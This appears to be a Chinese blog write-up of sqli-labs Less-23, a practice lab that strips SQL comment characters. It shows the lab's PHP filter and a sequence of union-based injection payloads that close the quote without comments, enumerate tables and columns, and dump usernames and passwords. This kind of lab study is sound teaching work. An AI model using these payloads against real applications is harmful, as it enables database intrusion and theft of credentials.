Less -23

最新推荐文章于 2023-12-24 21:18:22 发布

_Raymond_

最新推荐文章于 2023-12-24 21:18:22 发布

阅读量119

点赞数

分类专栏： sql注入文章标签： sql注入

本文链接：https://blog.csdn.net/weixin_43745072/article/details/110010301

版权

sql注入专栏收录该内容

7 篇文章 0 订阅

订阅专栏

Less-23 注释符过滤

首先，在尝试'发现可以注入，但是在尝试注入之后一直报错。并且无论是#还是--+，回显都没有出现，初步判断是注释符过滤了。

在这里插入图片描述

查看源码可以看到，#和--+都被替换为了空字符。所以这次要考虑闭合掉引号，构造查询语句。

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

那么构造语句，测试是否存在注入点。查询成功，表示注入点存在的。

' or 1=1 or id='

在这里插入图片描述

从后台查看语句是。这里是使用了'对整个查询进行闭合，我们可以操作的部位就是在or 1=1

 SELECT * FROM users WHERE id='' or 1=1 or id='' LIMIT 0,1

获取数据库名字，第二个关键字database()其实只是作为一个关键字，完善or并将查询语句补充完整，没有实际效用。

' union select 1,database(),3 or database()='2

在这里插入图片描述

获取表名，

' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" or database()='2

在这里插入图片描述

获取列名，这里将第二个database()换掉是因为会影响查询结果，直接换为table_name=users'可以完成查询与闭合。

' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name='users

在这里插入图片描述

获取数据，爆库成功

' union select 1,group_concat(concat_ws("|",id,username,password)),3 from users where database()='security

在这里插入图片描述

_Raymond_

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
Less -23

Less-23 注释符过滤首先，在尝试'发现可以注入，但是在尝试注入之后一直报错。并且无论是#还是--+，回显都没有出现，初步判断是注释符过滤了。查看源码可以看到，#和--+都被替换为了空字符。所以这次要考虑闭合掉引号，构造查询语句。//filter the comments out so as to comments should not work$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $
复制链接

扫一扫